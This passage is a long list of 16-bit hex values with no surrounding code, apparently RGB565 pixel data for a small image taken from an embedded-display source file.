0xa5d8, 0xf7ff, 0xe7bf, 0x29ea, 0xefdf, 0xf7df, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffff, 0xf7ff, 0xaf7f, 0x1bf5, 0x4c95, 0xe7ff, 0xffff, 0xffdf, 0xf7ff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffdf, 0xfffe, 0xe7ff, 0x2436, 0x1418, 0xc7df, 0xfffd, 0xf7ff, 0xffde, 0xfffe, 0xf7df, 0xdfbf, 0x6433, 0x9576, 0x8d15, 0x84d5, 0x8517, 0x84f5, 0x84d4, 0x84f6, 0x6c54, 0xbedd, 0xefff, 0xf7be, 0xf7df, 0xefdf, 0xf7ff, 0xa556, 0x7432, 0x8d98, 0x8d79, 0x6c33, 0xce9b, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xfffe, 0xefff, 0xffdf, 0xffbe, 0xf7ff, 0x9f5f, 0x0b73, 0x6d59, 0xefff, 0xf7ff, 0xf7ff, 0xffff, 0xfffe, 0xf7ff, 0x8e1a, 0x1352, 0x767f, 0xffff, 0xf7be, 0xffff, 0xf7fe, 0xf7ff, 0xffff, 0xf7ff, 0xf7ff, 0xefff, 0xefff, 0xefff, 0xefff, 0xefff, 0xefff, 0xefff, 0xefff, 0xefff, 0xefff, 0xefff, 0xf7ff, 0xf7ff, 0xef9f, 0xffff, 0xefff, 0xf7ff, 0xe7bf, 0xa577, 0xefdf, 0xefff, 0xf7ff, 0xffff, 0xffdf, 0xffdd, 0xf7ff, 0xf7ff, 0xfffd, 0xfffc, 0xdfff, 0x2c99, 0x13f7, 0xd7df, 0xfffd, 0xfffe, 0xf7ff, 0xf7ff, 0xffff, 0xfffe, 0xffff,
0xffbe, 0xffff, 0xffdf, 0xf7ff, 0xcfff, 0x2413, 0x3435, 0xcfdf, 0xf7ff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xfffc, 0xffff, 0xf7ff, 0xffde, 0xffde, 0xf7ff, 0x4c14, 0x43b2, 0xf7ff, 0xe79f, 0x01cb, 0x8ebf, 0xdfff, 0x52ef, 0x7432, 0xdfff, 0xf7ff, 0xfffe, 0xfffe, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xfffd, 0xfffd, 0xefff, 0x85dc, 0x1b53, 0x869f, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xf7ff, 0x865e, 0x0b73, 0x863b, 0xf7ff, 0xffbd, 0xffde, 0xffbf, 0xffff, 0xf7ff, 0xf7ff, 0xffdf, 0xffde, 0xf7fe, 0x9e1a, 0x0252, 0x135a, 0x0b18, 0x1b56, 0x1b55, 0x1357, 0x0b58, 0x0378, 0x0b56, 0x1337, 0x1318, 0x1b58, 0x1357, 0x0337, 0x1356, 0x1a8f, 0xf7ff, 0xffde, 0xffdf, 0xf7ff, 0xf7ff, 0xfffe, 0xfffe, 0xffdf, 0xffdd, 0xf7ff, 0xd7ff, 0x2bd3, 0x3456, 0xc7ff, 0xefff, 0xfffe, 0xfffd, 0xfffe, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0x3ddf, 0x1373, 0xb6bc, 0xffff, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xf7ff, 0xc6de, 0x11ed, 0xdfff, 0x7cf7, 0xb69d, 0x6c56, 0x014d, 0xdf5f, 0xefff, 0xf7fe, 0xfffc, 0xfffd, 0xffbd, 0xffff, 0xfffd, 0xffbd, 0xffff, 0xdfff, 0x1ad2, 0x12d0, 0xc7ff, 0x5c11, 0xe7ff, 0x22d3, 0x8518, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdd, 0xf7ff, 0xc7ff, 0x1393, 0x4495, 0xe7ff, 0xffdf, 0xffdf, 0xffff, 0xf7ff, 0xfffe, 0xf7ff, 0xf7ff, 0xffde, 0xffdd, 0xdfff, 0x455b, 0x0395, 0xb77f, 0xffff, 0xfffd, 0xfffe, 0xffdf, 0xffdf, 0xffff, 0xf7ff, 0xffdc, 0xfffe, 0xf7bf, 0xefff, 0x53b2, 0x9556, 0xffff, 0xf7fe, 0x9576, 0xdfdf, 0x63b4, 0x9519, 0x9539, 0x5bf2, 0xe7ff, 0x9db5, 0xf7ff, 0xefff, 0x9d78, 0x6390, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffde, 0xffff, 0xf7ff, 0xaf5f, 0x0bb3, 0x64f6, 0xe7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffdf, 0xffde, 0xfffe, 0xdfff, 0x2457, 0x1418, 0xb75f, 0xfffe, 0xf7df, 0xffdf, 0xffbd, 0xffdf, 0xbedd, 0x8dba, 0xcf5f, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xbebd, 0xa5d9, 0xf7ff, 0xf7ff, 0xefff, 0xe7ff, 0x5370, 0x9dd8, 0xd7df, 0x64f7, 0x759a, 0xd7df, 0x7434, 0x94b5, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7df, 0xffff, 0xefff, 0xffbe, 0xffbd, 0xf7ff, 0x86ff, 0x0373, 0x75ba, 0xefff, 0xf7ff, 0xf7ff, 0xffff, 0xfffe, 0xf7ff, 0x8e5a, 0x0b11, 0x6e5f, 0xfffe, 0xfffe, 0xffff, 0xf7ff, 0xf7ff, 0xc67c, 0x6bb2, 0x7c94, 0x6c72, 0x6cb3, 0x6c73, 0x7454, 0x7434, 0x7495, 0x6c74, 0x6453, 0x7473, 0x7452, 0x7c12, 0x8432, 0xef3e, 0xffdf, 0xf7df, 0xf7ff, 0x9d97, 0x9577, 0x84f5, 0xefff, 0xf7ff, 0xf7ff, 0xffff, 0xffbf, 0xffdc, 0xf7df, 0xf7ff, 0xffde, 0xfffc, 0xd7ff, 0x2477, 0x1416, 0xcfff, 0xfffe, 0xffde, 0xf7df, 0xf7ff, 0xffff, 0xfffe, 0xfffe,
0xf7ff, 0xffff, 0xffdf, 0xffff, 0xd7ff, 0x44d6, 0x13f5, 0xb7ff, 0xefff, 0xffdf, 0xffbf, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xf7ff, 0xf7ff, 0xa598, 0x853a, 0x657e, 0x0b96, 0x4456, 0xefff, 0xe7be, 0x09ca, 0x969f, 0xdfff, 0x52ae, 0x7c12, 0xe7ff, 0xfffd, 0xfffd, 0xf7fe, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xf7df, 0xffdf, 0xffdf, 0xfffd, 0xf7fe, 0xefff, 0x7518, 0x1b31, 0x975f, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffd, 0xfffe, 0xffff, 0xffbf, 0xffbf, 0xf7ff, 0x96fc, 0x1391, 0x6d9a, 0xe7ff, 0xf7ff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xff9f, 0xffff, 0x53b5, 0x0ad5, 0x0359, 0x0378, 0x0b76, 0x0b58, 0x0b39, 0x0b39, 0x1359, 0x1359, 0x0b39, 0x0b38, 0x1357, 0x1336, 0x0b58, 0x0b37, 0x0a50, 0xcefd, 0xffff, 0xffff, 0xf7ff, 0xfffe, 0xfffc, 0xfffe, 0xf7ff, 0xfffd, 0xefff, 0xb7ff, 0x13b5, 0x4497, 0xd7ff, 0xf7ff, 0xffff, 0xfffe, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xf7fe, 0xf7fe, 0xf7fe, 0x667f, 0x1333, 0x95fd, 0xf7ff, 0xffff, 0xfffe, 0xfffe, 0xf7ff, 0xefff, 0xa65c, 0x64fa, 0xaf1f, 0x19f1, 0x2a70, 0x3b0f, 0xc7df, 0xf7ff, 0xf7df, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xf7fd, 0xfffe, 0xf7ff, 0x6bd4, 0x2210, 0x1251, 0x6dfe, 0x9e9e, 0x84d4, 0xffde, 0xffff, 0xf7bf, 0xffff, 0xffde, 0xf7ff, 0x9f5f, 0x0b74, 0x64f8, 0xf7ff, 0xff9f, 0xffbf, 0xffff, 0xfffe, 0xffde, 0xffff, 0xf7ff, 0xfffe, 0xffdd, 0xefff, 0x6579, 0x1b72, 0x9edd, 0xefff, 0xefff, 0xe7ff, 0xf7ff, 0xffbf, 0xffde, 0xfffe, 0xffdf, 0xffff, 0xf7ff, 0xc69b, 0x52ed, 0xffff, 0xffff, 0xf7ff, 0x8d57, 0xc75f, 0x53f3, 0x7539, 0x7d3a, 0x53f4, 0xcf3f, 0xa598, 0xfffd, 0xefff, 0xe7ff, 0x4b2f, 0xce9c, 0xffff, 0xf7ff, 0xf7ff, 0xfffe, 0xffdf, 0xffbf, 0xffbf, 0xffdf, 0xf7ff, 0x8e9c, 0x0bd5, 0x8597, 0xefff, 0xffff, 0xf7df, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xff9d, 0xf7ff, 0x4cd8, 0x0bd4, 0xa73f, 0xffdf, 0xf7ff, 0xffdf, 0xffde, 0xffff, 0xcf1e, 0x7496, 0x9dda, 0xf7ff, 0xfffe, 0xfffe, 0xffdf, 0xffff, 0xffff, 0xc679, 0xae18, 0xefff, 0xfffe, 0xffff, 0x8452, 0xc65b, 0xf7ff, 0x7432, 0xe7bf, 0xbdb6, 0x9450, 0xffff, 0x8516, 0x9dda, 0xffdf, 0xff9f, 0xffde, 0xf7fe, 0xf7ff, 0xffbd, 0xff9d, 0xf7ff, 0x763e, 0x0354, 0x8e5d, 0xf7ff, 0xfffe, 0xffdf, 0xffbf, 0xffdf, 0xf7ff, 0xb6fe, 0x1b31, 0x4d7c, 0xf7fe, 0xf7ff, 0xf7df, 0xf7ff, 0xf7ff, 0x7452, 0xc73e, 0xcfbf, 0xcf9e, 0xd75c, 0xe75d, 0xdf3e, 0xcf7f, 0xc79f, 0xcf7e, 0xef7e, 0xdfff, 0xe7ff, 0xf7ff, 0xbe3a, 0x7c53, 0xf7ff, 0xefff, 0x9556, 0xc6fc, 0xcf5f, 0xc6ff, 0x8d1a, 0xffff, 0xf7de, 0xf7bd, 0xffff, 0xffdb, 0xffff, 0xffff, 0xf79f, 0xffff, 0xbfdf, 0x1414, 0x2cd8, 0xcfff, 0xffde, 0xffbe, 0xffbf, 0xffdf, 0xffdf, 0xffff, 0xffff,
0xffde, 0xffff, 0xf7ff, 0xf7fe, 0xefff, 0x6518, 0x1375, 0x9f3f, 0xefff, 0xfffd, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xff9d, 0xffff, 0xf7df, 0x632e, 0x324c, 0x22f1, 0x0af3, 0x4c36, 0xefff, 0xefbf, 0x0989, 0x9e9f, 0xdfff, 0x4aaf, 0x7433, 0xe7ff, 0xfffe, 0xfffe, 0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xfffe, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xd7ff, 0x4455, 0x2372, 0xc7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xf7ff, 0xb7bf, 0x13b2, 0x3c75, 0xdfff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf7fe, 0xf7fe, 0xffff, 0xffdf, 0xf7ff, 0x22f3, 0x0316, 0x0399, 0x0b56, 0x0b35, 0x0b77, 0x0379, 0x1338, 0x22f5, 0x0b36, 0x1378, 0x0b58, 0x0b37, 0x1378, 0x0b59, 0x0b58, 0x0271, 0x9e1b, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffdf, 0xffbc, 0xefff, 0x96ff, 0x1374, 0x6d59, 0xefff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xf7fe, 0xf7fe, 0xffff, 0x8eff, 0x2393, 0x64f7, 0xe7ff, 0xffff, 0xffff, 0xf7ff, 0xeffe, 0xf7ff, 0xc6de, 0x5437, 0x1293, 0x2af2, 0x9558, 0xefff, 0xefff, 0xf7fe, 0xffdf, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xf7ff, 0xf7ff, 0xffde, 0xfffe, 0xfffe, 0xffff, 0xf7ff, 0xae1d, 0x3b53, 0x0250, 0x5456, 0x9558, 0xffff, 0xf7df, 0xf7ff, 0xffff, 0xffbc, 0xefff, 0x7e5f, 0x0375, 0x6dbb, 0xf7ff, 0xffdf, 0xffdf, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xfffe, 0xefff, 0x967e, 0x1332, 0x759b, 0xe7ff, 0xf7ff, 0xffff, 0xf7bf, 0xffdf, 0xffff, 0xfffe, 0xffdf, 0xffff, 0xf7ff, 0x63f1, 0xb65a, 0xffff, 0xffdf, 0xf7df, 0xdf7e, 0x8d77, 0x8d78, 0x8d58, 0x9557, 0x9537, 0x8d36, 0xdfbf, 0xfffe, 0xffff, 0xefff, 0xae3a, 0x73f1, 0xffff, 0xf7df, 0xfffe, 0xf7fe, 0xf7ff, 0xffdf, 0xffdf, 0xff9e, 0xefff, 0x75bb, 0x0375, 0xa67a, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffbe, 0xffbe, 0xf7ff, 0x6ddb, 0x0bb4, 0x8e5d, 0xf7ff, 0xf7ff, 0xffff, 0xffde, 0xf7ff, 0xc75f, 0x7d18, 0x9db8, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xc67a, 0xadf9, 0xf7ff, 0xffff, 0xcefb, 0x84b3, 0xf7ff, 0xefff, 0x95b8, 0xa65b, 0x9d98, 0xef9f, 0xf7ff, 0xdfdf, 0x6c53, 0xffdf, 0xffdf, 0xffff, 0xe7fd, 0xf7ff, 0xffbd, 0xff9c, 0xe7ff, 0x4d7c, 0x0354, 0xaf3f, 0xffff, 0xffde, 0xffff, 0xffdf, 0xffde, 0xffff, 0xd7bf, 0x1352, 0x24db, 0xf7ff, 0xffdf, 0xffbf, 0xffdf, 0xf7ff, 0x84d5, 0xdfdf, 0x5390, 0x74b4, 0x84f4, 0x7c53, 0x8495, 0x7cd6, 0x74d5, 0x7cd4, 0x5b2d, 0xbf1d, 0xcf3d, 0x73d0, 0xcedb, 0x8494, 0xe7df, 0xae5c, 0x63f1, 0xc6fb, 0xae7a, 0xb67d, 0x5bb3, 0xc69d, 0xf7df, 0xffdd, 0xfffd, 0xfffd, 0xf7ff, 0xefff, 0xffff, 0xfffe, 0xb71d, 0x1394, 0x4d1b, 0xdfff, 0xffde, 0xffdd, 0xffdf, 0xf7df, 0xffdf, 0xffff, 0xffff,
0xfffe, 0xf7ff, 0xf7ff, 0xfffe, 0xfffe, 0x95fb, 0x1b56, 0x6dff, 0xdfff, 0xfffc, 0xfffc, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffdf, 0xffbf, 0xffff, 0xffbe, 0xf7de, 0xdfff, 0x3bf6, 0x43b4, 0xf7ff, 0xef7f, 0x1169, 0x9e7f, 0xdfff, 0x4af0, 0x7c54, 0xdfff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xfffe, 0xffdc, 0xfffd, 0xffff, 0xffff, 0xffdf, 0xf7ff, 0xbfbf, 0x23f5, 0x2bd3, 0xdfff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xd7ff, 0x23d3, 0x1bf4, 0xc7ff, 0xf7ff, 0xff9c, 0xffff, 0xffff, 0xf7fe, 0xf7fe, 0xffff, 0xffdf, 0xe7bf, 0x12b2, 0x0398, 0x0378, 0x1b56, 0x1b35, 0x0b57, 0x0378, 0x0b36, 0x2b35, 0x1375, 0x0b56, 0x0b57, 0x1378, 0x0b38, 0x0b39, 0x1379, 0x0292, 0x7d99, 0xf7ff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffbf, 0xffdd, 0xe7ff, 0x5dbe, 0x0b12, 0x961a, 0xffff, 0xf7de, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xbf9f, 0x2bd3, 0x3433, 0xd7ff, 0xffff, 0xffff, 0xf7ff, 0xf7fe, 0xfffe, 0xd6de, 0x098d, 0x33b6, 0xcfff, 0xefff, 0xffdf, 0xffdf, 0xfffc, 0xffdd, 0xffdf, 0xffbf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffde, 0xffff, 0xf7ff, 0xffff, 0xf7ff, 0xdfff, 0x6cfa, 0x016d, 0x957a, 0xf7df, 0xf7ff, 0xefff, 0xfffe, 0xfffd, 0xefff, 0x4d1b, 0x0bb7, 0x9f1f, 0xf7ff, 0xfffe, 0xf7ff, 0xefff, 0xf7ff, 0xffdf, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xf7ff, 0xc7bf, 0x1b33, 0x4c98, 0xdfff, 0xffff, 0xffdd, 0xffde, 0xffff, 0xffff, 0xfffe, 0xf7ff, 0xf7ff, 0xe7ff, 0x328c, 0xdfbf, 0xf7df, 0xffde, 0xfffd, 0xffff, 0xefff, 0xefff, 0xf7ff, 0xffff, 0xffff, 0xf7df, 0xefff, 0xffbf, 0xf7be, 0xf7fe, 0xe7df, 0x428c, 0xf7ff, 0xffff, 0xfffe, 0xf7fe, 0xefff, 0xffff, 0xffdf, 0xfffe, 0xf7ff, 0x4477, 0x0399, 0xc77e, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xf7ff, 0xf7df, 0xffdf, 0xffbf, 0xf7ff, 0x9eff, 0x1393, 0x54f8, 0xe7ff, 0xf7df, 0xffff, 0xfffe, 0xf7ff, 0xbf1f, 0x6cf6, 0xa5f9, 0xffff, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xffff, 0xc65a, 0xb5f9, 0xf7ff, 0xf7ff, 0xae5a, 0x9597, 0xefff, 0xd73f, 0xcf9f, 0x4c54, 0x6d18, 0x957a, 0xcefe, 0xe7ff, 0x8515, 0xef9f, 0xffdf, 0xffff, 0xeffe, 0xf7ff, 0xfffe, 0xfffd, 0xcfff, 0x2458, 0x13f7, 0xcfff, 0xffff, 0xffde, 0xffff, 0xfffe, 0xfffc, 0xfffd, 0xefff, 0x23f6, 0x043a, 0xd73e, 0xffff, 0xffff, 0xffff, 0xefff, 0x7cb5, 0xdfdf, 0x7494, 0xdfff, 0xae9c, 0xefff, 0xb65d, 0xe7df, 0xc73f, 0xdfff, 0x9597, 0xae5c, 0xefff, 0xefbf, 0xbe7a, 0x9db8, 0x7cf7, 0xa63b, 0xc6fd, 0xc6db, 0xbe79, 0xbedb, 0xcf1e, 0x84d5, 0xa5b8, 0xf7ff, 0xf7fe, 0xfffe, 0xefff, 0xf7ff, 0xf7fe, 0xf7ff, 0x8599, 0x1b75, 0x861f, 0xefff, 0xffdd, 0xfffd, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff,
0xffdc, 0xf7ff, 0xefff, 0xfffe, 0xfffd, 0xd79f, 0x0b35, 0x347b, 0xdfff, 0xfffd, 0xfffc, 0xffff, 0xffff, 0xffff, 0xffdf, 0xf7ff, 0xfffe, 0xffbf, 0xffdf, 0xffbd, 0xffde, 0xefff, 0x43f7, 0x4bf5, 0xefff, 0xefbf, 0x118b, 0xa69f, 0xe7ff, 0x4acc, 0x5b90, 0xdfff, 0xf7fe, 0xffdf, 0xffdf, 0xffff, 0xf7ff, 0xfffe, 0xffde, 0xffff, 0xf7ff, 0xf7ff, 0xfffe, 0xefff, 0x865f, 0x0b54, 0x6559, 0xefff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xefff, 0x5518, 0x0bd4, 0x86df, 0xefff, 0xffbc, 0xffdf, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xf7ff, 0x2313, 0x0337, 0x0378, 0x1316, 0x2356, 0x0b37, 0x0379, 0x0379, 0x1317, 0x0b76, 0x0b78, 0x0b38, 0x1358, 0x1358, 0x0338, 0x0b79, 0x0272, 0x9e1b, 0xffff, 0xffdd, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffdd, 0xcfff, 0x2c79, 0x1b74, 0xe7ff, 0xffbd, 0xffff, 0xf7ff, 0xf7fe, 0xffde, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xf7ff, 0xe7ff, 0x54f6, 0x0b71, 0xaf5f, 0xffff, 0xffbe, 0xfffe, 0xf7fd, 0xffff, 0xbe5c, 0x6d1b, 0x655b, 0x1a6c, 0xe77d, 0xffff, 0xffff, 0xf7fc, 0xfffd, 0xffff, 0xffde, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffde, 0xffff, 0xffdf, 0xffff, 0xf7be, 0xf7ff, 0x538f, 0x53d4, 0x75ff, 0x74b7, 0xffff, 0xf7bf, 0xf7ff, 0xf7de, 0xfffe, 0xd7df, 0x1bf7, 0x1bf7, 0xcfff, 0xfffd, 0xffdd, 0xf7ff, 0xefff, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xfffe, 0xfffe, 0xf7ff, 0xdfff, 0x3bf6, 0x2bb5, 0xbf5f, 0xf7ff, 0xffdd, 0xffff, 0xf7ff, 0xffdf, 0xffbd, 0xf7de, 0xf7ff, 0xe7ff, 0x3aac, 0xefff, 0xffff, 0xffdd, 0xffdd, 0xf7bd, 0xf7ff, 0xf7ff, 0xffff, 0xfffe, 0xffbd, 0xfffe, 0xefdf, 0xffbf, 0xffdf, 0xffff, 0xefff, 0x3aad, 0xe7ff, 0xefff, 0xfffd, 0xfffd, 0xffff, 0xffdf, 0xffdf, 0xfffe, 0xd79d, 0x1b53, 0x145d, 0xe7ff, 0xf7ff, 0xffdf, 0xffdf, 0xffff, 0xf7ff, 0xffff, 0xf7ff, 0xffff, 0xff9e, 0xffbf, 0xf7ff, 0xc7ff, 0x2bf3, 0x2373, 0xcfff, 0xffff, 0xffbd, 0xffdd, 0xffff, 0xcefe, 0x95d9, 0xefff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xc67b, 0xadf9, 0xf7ff, 0xf7ff, 0xb67b, 0xb6bc, 0x84f6, 0x84d7, 0xae9d, 0x64b5, 0x6cd6, 0xae9e, 0x5c13, 0xaefd, 0x8db7, 0xe79f, 0xff9f, 0xffff, 0xeffe, 0xf7df, 0xffde, 0xf7fe, 0xa73e, 0x0bb4, 0x3cf9, 0xdfff, 0xffff, 0xffbe, 0xffff, 0xf7ff, 0xfffc, 0xffdc, 0xefff, 0x5d5b, 0x03d7, 0xae5c, 0xefff, 0xf7ff, 0xf7fe, 0xf7ff, 0x84f4, 0xd7bf, 0x74d6, 0x9e1a, 0x6453, 0x4350, 0x6c75, 0x5392, 0x6433, 0x64b4, 0x961a, 0xb67c, 0xcf3e, 0x536e, 0xbefd, 0x74f5, 0xd7df, 0x9599, 0x9d98, 0xe7bf, 0xf7ff, 0xf7fe, 0xf7ff, 0x7c53, 0x9d99, 0x9599, 0x9e39, 0xffde, 0xffff, 0xffff, 0xf7ff, 0xdfff, 0x4456, 0x1333, 0xc7df, 0xf7ff, 0xffdd, 0xfffe, 0xf7ff, 0xf7ff, 0xfffe, 0xffff, 0xffff,
0xfffd, 0xf7ff, 0xf7ff, 0xffdd, 0xffbb, 0xefff, 0x2c79, 0x0397, 0xb73f, 0xffde, 0xfffd, 0xfffe, 0xfffe, 0xfffd, 0xffde, 0xffdf, 0xf7fe, 0xffff, 0xffff, 0xffbd, 0xffff, 0xb6bf, 0x09ef, 0x6c97, 0xf7ff, 0xdfbf, 0x09ab, 0x9e7f, 0xefff, 0xa553, 0x1188, 0x7d9e, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffbf, 0xffdf, 0xefff, 0xeffe, 0xf7fe, 0xe7ff, 0x3417, 0x13d7, 0xa73f, 0xf7fd, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0x9ebe, 0x0bd5, 0x34f9, 0xe7ff, 0xffbc, 0xffdf, 0xffbe, 0xffff, 0xffff, 0xf7be, 0xffff, 0xffff, 0x53f5, 0x02f5, 0x0b79, 0x1337, 0x1b16, 0x1337, 0x0b9a, 0x035a, 0x0359, 0x0378, 0x0339, 0x135a, 0x1337, 0x0b56, 0x0b98, 0x0b59, 0x0211, 0xd73f, 0xfffe, 0xfffd, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xfffd, 0xaf1f, 0x0bb5, 0x4498, 0xe7ff, 0xfffe, 0xffff, 0xffff, 0xffde, 0xffde, 0xffff, 0xf7ff, 0xffff, 0xfffe, 0xfffe, 0xf7de, 0xf7ff, 0x867c, 0x0b74, 0x6d7b, 0xf7ff, 0xfffd, 0xffbb, 0xfffe, 0xffdf, 0xc6de, 0x0a2e, 0xc7ff, 0xbf1f, 0x4a6b, 0xffff, 0xefff, 0xf7fe, 0xf7ff, 0xffff, 0xfffe, 0xfffd, 0xfffe, 0xffff, 0xffff, 0xffde, 0xffff, 0xf7df, 0xefbf, 0xffff, 0x6b8e, 0x9576, 0xe7ff, 0x1b56, 0x8518, 0xffff, 0xffbd, 0xf7be, 0xffff, 0xf7ff, 0x969d, 0x0b74, 0x557b, 0xe7ff, 0xffbc, 0xffde, 0xf7ff, 0xf7ff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffdf, 0xefff, 0x75ba, 0x1393, 0x7e3d, 0xe7ff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffbe, 0xffdd, 0xffff, 0xefff, 0x3acd, 0xefff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xefff, 0x32ad, 0xdfff, 0xefff, 0xfffd, 0xffbc, 0xffbf, 0xffbf, 0xf7df, 0xefff, 0x85b7, 0x1b72, 0x5ddf, 0xf7ff, 0xf7ff, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffbf, 0xffdf, 0xf7ff, 0xe7ff, 0x6517, 0x1b53, 0x86bf, 0xffff, 0xfffd, 0xfffd, 0xffff, 0xdf1d, 0x9536, 0xefff, 0xf7ff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xc67a, 0xadf8, 0xf7ff, 0xffff, 0xdf1d, 0x8cf6, 0x8518, 0xc75f, 0x9dfb, 0x9577, 0xbebb, 0xa63b, 0x963c, 0x8e3b, 0x6cb4, 0xffff, 0xff9f, 0xffbf, 0xf7df, 0xffbf, 0xffff, 0xdfff, 0x5d37, 0x1bb2, 0x7e5c, 0xe7ff, 0xffdf, 0xffbf, 0xffdf, 0xffff, 0xfffe, 0xfffd, 0xefff, 0xa71f, 0x1374, 0x4c35, 0xd7ff, 0xefff, 0xeffd, 0xefff, 0x7d14, 0xd7ff, 0x6473, 0xd7df, 0xb6bc, 0xdfff, 0xbefd, 0xdfff, 0xb73f, 0xc7df, 0x7d98, 0xb67b, 0xe7ff, 0xcf7f, 0xb6dd, 0x7cf6, 0xd7bf, 0x9557, 0xf7ff, 0xffff, 0xffde, 0xfffd, 0xffde, 0xe75f, 0xb65e, 0xc75f, 0x7d58, 0xe6fb, 0xfffe, 0xffbe, 0xf7ff, 0xa71f, 0x1b95, 0x3456, 0xdfff, 0xfffe, 0xffdd, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff,
0xffbd, 0xffff, 0xffff, 0xffbd, 0xffdd, 0xefff, 0x7e7f, 0x0b95, 0x5cb7, 0xf7ff, 0xffde, 0xffde, 0xffff, 0xfffe, 0xffff, 0xffdf, 0xefff, 0xffff, 0xffde, 0xffff, 0xe7ff, 0x1a6f, 0x3b73, 0xefff, 0xffff, 0xdfbf, 0x01ec, 0x9ebe, 0xf7ff, 0xfffe, 0x7475, 0x01f1, 0xdfbf, 0xf7ff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xff9e, 0xffbf, 0xf7ff, 0xf7ff, 0xefff, 0xb73f, 0x1395, 0x2c79, 0xcfff, 0xfffc, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffde, 0xd7ff, 0x2c78, 0x0bb5, 0xb77f, 0xffff, 0xffbe, 0xffde, 0xffdd, 0xfffe, 0xfffe, 0xffde, 0xf7ff, 0x9dfb, 0x0a72, 0x0317, 0x1399, 0x1337, 0x1316, 0x1358, 0x0b58, 0x0378, 0x0b57, 0x1358, 0x0b17, 0x1377, 0x0b76, 0x0377, 0x0af6, 0x2b14, 0xf7ff, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffbe, 0xffde, 0xf7ff, 0xe7ff, 0x4c96, 0x1394, 0x8e7e, 0xefff, 0xffff, 0xffdf, 0xffff, 0xffde, 0xffde, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xfffe, 0xf7de, 0xf7fe, 0xc7ff, 0x13f6, 0x23d5, 0xcf7f, 0xfffe, 0xfffe, 0xffdf, 0xffff, 0xc6de, 0x126e, 0x4c76, 0xe7ff, 0xb557, 0x9cd5, 0xe7ff, 0xefff, 0xf7ff, 